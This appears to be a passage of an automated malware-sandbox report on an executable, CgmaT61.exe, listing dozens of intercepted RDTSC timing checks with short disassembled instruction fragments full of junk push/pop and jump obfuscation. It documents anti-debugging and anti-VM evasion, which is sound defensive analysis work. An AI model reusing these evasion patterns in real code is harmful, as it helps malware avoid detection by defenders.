Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C19B57 second address: C19B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C19B5B second address: C19B65 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD32CC50B96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4F89C second address: C3A789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E28Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b mov edx, 2723D019h 0x00000010 lea eax, dword ptr [ebp+1247D642h] 0x00000016 mov edx, dword ptr [ebp+122D2772h] 0x0000001c push eax 0x0000001d push esi 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 pop esi 0x00000023 mov dword ptr [esp], eax 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FD32D43E288h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 mov cl, dh 0x00000042 movzx ecx, ax 0x00000045 call dword ptr [ebp+122D2847h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push edi 0x0000004e jl 00007FD32D43E286h 0x00000054 pop edi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4FD9D second address: C4FDA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4FEBC second address: C4FED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4FED6 second address: C4FEF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FD32CC50B96h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jp 00007FD32CC50B96h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4FEF0 second address: C4FEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5005D second address: C50063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C50063 second address: C50076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FD32D43E298h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C50076 second address: C5007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5007A second address: C500C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f jne 00007FD32D43E288h 0x00000015 pop edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push edx 0x00000019 jnl 00007FD32D43E29Fh 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jbe 00007FD32D43E2A3h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C500C3 second address: C500C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C50C2F second address: C50C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C50C33 second address: C50C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C50C37 second address: C50CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FD32D43E28Ah 0x0000000f lea eax, dword ptr [ebp+1247D686h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FD32D43E288h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f movsx ecx, dx 0x00000032 push eax 0x00000033 jnl 00007FD32D43E28Ch 0x00000039 mov dword ptr [esp], eax 0x0000003c adc cx, 2140h 0x00000041 lea eax, dword ptr [ebp+1247D642h] 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007FD32D43E288h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 0000001Ah 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 jnl 00007FD32D43E288h 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b jng 00007FD32D43E286h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C92E90 second address: C92E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C93024 second address: C9303C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD32D43E286h 0x00000008 jne 00007FD32D43E286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FD32D43E288h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9303C second address: C9306B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FD32CC50BA8h 0x0000000a jp 00007FD32CC50B96h 0x00000010 popad 0x00000011 pushad 0x00000012 je 00007FD32CC50B96h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9347F second address: C93483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C93483 second address: C9348E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9348E second address: C93499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C93499 second address: C9349D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9349D second address: C934BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD32D43E299h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C934BE second address: C934C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C93986 second address: C9398C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9398C second address: C93992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9616B second address: C9616F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9616F second address: C96173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C96173 second address: C96179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C96179 second address: C96182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C96182 second address: C96188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C96188 second address: C961A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD32CC50B9Fh 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C961A7 second address: C961B1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD32D43E28Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9B657 second address: C9B65B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9B65B second address: C9B671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FD32D43E288h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9B671 second address: C9B675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9B675 second address: C9B679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9B679 second address: C9B67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9B67F second address: C9B692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jp 00007FD32D43E286h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9E606 second address: C9E60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9DD41 second address: C9DD45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C9DD45 second address: C9DD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32CC50BA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FD32CC50B9Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C165DA second address: C165E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA1881 second address: CA18A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD32CC50B96h 0x00000008 jmp 00007FD32CC50BA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jno 00007FD32CC50B96h 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA1F73 second address: CA1F7D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA737D second address: CA7383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA7383 second address: CA7389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA78FF second address: CA7903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA7903 second address: CA7921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FD32D43E286h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA7921 second address: CA7943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA7ABE second address: CA7AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA7C48 second address: CA7C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CA7C5C second address: CA7C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB07E0 second address: CB07EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD32CC50B96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB07EF second address: CB07F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB07F3 second address: CB07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB07FF second address: CB0805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB0805 second address: CB080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAE6FD second address: CAE708 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAE708 second address: CAE710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAE710 second address: CAE715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAE9A7 second address: CAE9CC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD32CC50B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD32CC50BA9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAF8E3 second address: CAF8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAF8E7 second address: CAF90E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD32CC50B96h 0x00000008 jmp 00007FD32CC50BA9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAF90E second address: CAF912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAF912 second address: CAF931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAF931 second address: CAF936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CAFF0C second address: CAFF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32CC50BA7h 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007FD32CC50B96h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD32CC50BA8h 0x0000001f jl 00007FD32CC50B96h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8E8E second address: CB8E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8E92 second address: CB8E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8E9B second address: CB8EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8EA1 second address: CB8ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD32CC50B96h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d jmp 00007FD32CC50BA5h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007FD32CC50B96h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8ECC second address: CB8ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB831F second address: CB8325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8325 second address: CB8329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8425 second address: CB842D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB842D second address: CB8459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E292h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD32D43E28Dh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8459 second address: CB8476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32CC50BA9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8730 second address: CB873A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD32D43E28Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8852 second address: CB8856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8856 second address: CB8877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD32D43E299h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8877 second address: CB8888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD32CC50B9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8888 second address: CB888E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB89C5 second address: CB89F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50BA9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007FD32CC50B96h 0x00000010 je 00007FD32CC50B96h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB89F9 second address: CB8A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8A01 second address: CB8A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD32CC50B96h 0x0000000a jns 00007FD32CC50B96h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8A12 second address: CB8A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8A18 second address: CB8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CB8B95 second address: CB8B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD32D43E286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC148B second address: CC1491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC1491 second address: CC1495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC1495 second address: CC1499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC1499 second address: CC14A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: CC14A4 second address: CC14E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD32CC50B96h 0x0000000a pop esi 0x0000000b jg 00007FD32CC50B9Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FD32CC50BB0h 0x0000001a jnc 00007FD32CC50B96h 0x00000020 jmp 00007FD32CC50BA4h 0x00000025 push esi 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 pop esi 0x00000029 rdtsc
